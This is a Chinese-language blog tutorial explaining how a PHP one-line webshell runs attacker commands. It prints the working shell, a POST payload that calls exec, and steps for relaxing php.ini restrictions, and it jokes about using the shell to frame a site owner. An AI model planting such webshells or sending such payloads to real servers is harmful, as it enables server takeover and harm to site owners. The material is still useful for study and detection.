一句話木馬（webshell）是如何執行指令的

在很多的滲透過程中，滲透人員會上傳一句話木馬（簡稱webshell）到目前web服務目錄繼而提權擷取系統權限，不論asp、php、jsp、aspx都是如此，那麼一句話木馬到底是如何執行的呢，下面我們就對webshell進行一個簡單的分析。

首先我們先看一個原始而又簡單的php一句話木馬。

<?php @eval($_POST['cmd']); ?>

看到這裡不得不贊美前輩的智慧。

對于一個稍微懂一些php的人而言，或者初級的安全愛好者，或者腳本小子而言，看到的第一眼就是密碼是cmd，通過post送出資料，但是具體如何執行的，卻不得而知，下面我們分析一句話是如何執行的。

這句話什麼意思呢？

php的代碼要寫在<?php  ?>裡面，伺服器才能認出來這是php代碼，然後才去解析。

@符号的意思是不報錯。

例如：

1

2

3

<code>&lt;?php</code>

<code>eval</code><code>($_POST[cmd]);</code>

<code>?&gt;</code>

如果沒有@，如下圖，就會報錯

<a href="https://s3.51cto.com/wyfs02/M01/99/07/wKioL1lDPU6wkqlpAAFTGLvgyDI589.png-wh_500x0-wm_3-wmp_4-s_489584269.png" target="_blank"></a>

為什麼呢？

因為一個變量沒有定義，就被拿去使用了，

伺服器就善意的提醒：Notice，你的xxx變量沒有定義。

這不就暴露了密碼嗎？

是以加上@

為什麼pw是密碼呢？

那就要來了解這句話的意思了

php裡面幾個超全局變量

$_GET、$_POST就是其中之一

$_POST['a'];

意思就是a這個變量，用post的方法接收。

（傳輸資料的兩種方法，get、post，post是在消息體存放資料，get是在消息頭的url路徑裡存放資料（例如xxx.php?a=2））

eval()

把字元串作為PHP代碼執行

例如：eval("echo 'a'");其實就等于直接 echo 'a';

再來看看&lt;?php eval($_POST['pw']); ?&gt;

首先，用post方式接收變量pw，比如接收到了：pw=echo 'a';

這時代碼就變成&lt;?php eval("echo 'a';"); ?&gt;

結果：

<a href="https://s2.51cto.com/wyfs02/M02/99/07/wKioL1lDPYHheDqUAACKGr0cbR0209.png-wh_500x0-wm_3-wmp_4-s_287531422.png" target="_blank"></a>

連起來意思就是：

用post方法接收變量pw,把變量pw裡面的字元串當做php代碼來執行

是以也就能這麼玩：

也就是說，你想執行什麼代碼，就把什麼代碼放進變量pw裡，用post傳輸給一句話木馬

你想檢視目标硬碟裡有沒有小黃片，可以用php函數：opendir()和readdir()等等

想上傳點小黃片，誣陷站主，就用php函數：move_uploaded_file，當然相應的html要寫好

你想執行cmd指令，則用exec()

當然前提是：

php配置檔案php.ini裡，關掉安全模式safe_mode = off，

然後在看看 禁用函數清單 disable_functions = proc_open, popen, exec, system, shell_exec ，把exec去掉，確定沒有exec。

（有些cms為了友善處理某些功能，會去掉的）

看看效果：

POST代碼如下：

4

5

<code>cmd=header(</code><code>"Content-type:text/html;charset=gbk"</code><code>);</code>

<code>exec</code><code>(</code><code>"ipconfig"</code><code>,$out);</code>

<code>echo</code> <code>'&lt;pre&gt;'</code><code>;</code>

<code>print_r($out);</code>

<code>echo</code> <code>'&lt;/pre&gt;'</code><code>;</code>

<a href="https://s3.51cto.com/wyfs02/M01/99/07/wKioL1lDPauzQBUkAAEhsqpAJK4196.png-wh_500x0-wm_3-wmp_4-s_2433346175.png" target="_blank"></a>

在這裡我們可以看到系統直接執行了系統指令，

SO,大家現在應該了解，為什麼說一句話短小精悍了吧！

我們在看一下一句話在菜刀之類的webshell管理工具裡面是如何一句話是如何執行的

其實在webshell管理工具裡面，已經內建好了所有可以執行的系統指令，我們隻需要輸入ifconfig、ipconfig、whoami、net user 等系統指令，就可以獲得對應的系統資訊。

<a href="https://s4.51cto.com/wyfs02/M01/99/07/wKioL1lDPeOjV78oAAEFI0QJX-M137.jpg-wh_500x0-wm_3-wmp_4-s_158398110.jpg" target="_blank"></a>

其實可以很明顯看明白，其實執行的指令就和我們前面寫的哪樣進行輸入輸出，執行系統指令操作。

是以隻要webshell有足夠高的權限，可以做任何你想做的事情。

     本文轉自Tar0 51CTO部落格，原文連結：http://blog.51cto.com/tar0cissp/1937364，如需轉載請自行聯系原作者